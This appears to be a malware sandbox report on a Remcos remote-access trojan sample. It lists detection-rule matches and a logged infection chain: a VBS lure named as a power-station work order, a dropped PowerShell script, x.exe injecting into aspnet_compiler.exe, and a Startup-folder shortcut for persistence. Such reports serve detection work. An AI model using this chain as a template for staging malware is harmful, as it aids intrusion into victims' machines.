                  Source: 00000007.00000002.1856200221.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000007.00000002.1856200221.0000000004E18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000007.00000002.1856200221.0000000004D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: Process Memory Space: powershell.exe PID: 7448, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 7672, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: x.exe PID: 7844, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: aspnet_compiler.exe PID: 7916, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: x.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: x.exe.1.dr, AesUtilities.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.powershell.exe.1ed3b50d5f0.0.raw.unpack, AesUtilities.csCryptographic APIs: 'CreateDecryptor'
                  Source: 4.2.powershell.exe.1f7aa73e970.0.raw.unpack, AesUtilities.csCryptographic APIs: 'CreateDecryptor'
                  Source: x.exe.1.dr, Program.csSuspicious method names: .Program.WritePayloadHeadersAndSections
                  Source: 4.2.powershell.exe.1f7aa73e970.0.raw.unpack, Program.csSuspicious method names: .Program.WritePayloadHeadersAndSections
                  Source: 1.2.powershell.exe.1ed3b50d5f0.0.raw.unpack, Program.csSuspicious method names: .Program.WritePayloadHeadersAndSections
                  Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@18/12@2/3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,11_2_00416AB7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,11_2_0040E219
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,11_2_0041A63F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_00419BC4
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRunScript.lnkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-UOMZ21
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Temp\dddddd.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs"
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
